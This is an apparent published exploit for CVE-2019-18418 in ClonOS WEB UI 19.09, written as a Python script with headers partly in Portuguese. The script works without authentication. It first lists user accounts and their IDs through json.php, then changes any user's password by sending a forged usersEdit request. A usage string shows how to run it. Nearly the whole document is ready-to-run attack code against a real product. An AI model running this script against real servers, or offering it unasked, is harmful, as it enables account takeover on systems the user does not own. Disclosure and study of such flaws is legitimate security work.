ClonOs WEB UI 19.09 – Improper Access Control
# Exploit Title: ClonOs WEB UI 19.09 – Controle de acesso inadequado
# Data: 2019-10-19
# Exploit Autor: İbrahim Hakan Şeker
# Página inicial do fornecedor: https://clonos.tekroutine.com/
# Link do software: https://github.com/clonos/control-pane
# Versão: 19.09
# Testado em: ClonOs
# CVE: 2019-18418
import requests
from bs4 import BeautifulSoup
import sys
def getUser(host):
reg=r'\"'
r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
r1_source = BeautifulSoup(r1.content,"lxml")
for k in r1_source.findAll("tr"):
for i in k.findAll("td")[0]:
print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}")
def changePassword(host,user,password,id):
data={
"mode":"usersEdit",
"path":"/users/",
"hash":"",
"db_path":"",
"form_data[username]":f"{user}",
"form_data[password]":f"{password}",
"form_data[password1]":f"{password}",
"form_data[first_name]":"",
"form_data[last_name]":"",
"form_data[actuser]":"on",
"form_data[user_id]": int(id)
}
r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
if r2.status_code==200:print("[+]OK")
else:print("[-]Fail")
if __name__=="__main__":
if len(sys.argv)>1:
if "getUser" in sys.argv[1]:getUser(sys.argv[2])
elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:print("Fail parameter")
else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")